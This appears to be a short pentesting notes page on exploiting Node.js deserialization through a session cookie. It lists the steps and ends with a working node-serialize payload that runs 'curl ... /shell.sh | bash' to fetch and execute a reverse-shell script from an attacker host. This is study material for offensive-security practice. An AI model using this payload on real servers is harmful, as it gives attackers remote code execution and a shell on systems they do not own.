Ctrlk

Javascript Vulnerabilities

Javascript Deserializaiton

Notice the assigned session cookie
Attempt to decode the cookie in the decoder tab
Attempt to modify the cookie by either

When we cut the cookie in half we get a server error
We see that the web application is trying to unserialize the session cookie but it’s getting an error.
Node Js de-serialization vulnerability is the easiest to exploit since the payload doesn’t change that much
We will modify the following payload a bit to get it working

Encode the cookie and see if that payload works to get command injection
Create a reverse shell script and make sure to chmod +x the script
Final Payload

Start your listener
Encode the payload to Base64 and then URL Encode
Send the request, and get a rev shell!

PreviousCmd Injection NextSSTI

Last updated 3 years ago

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.8.2.58:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}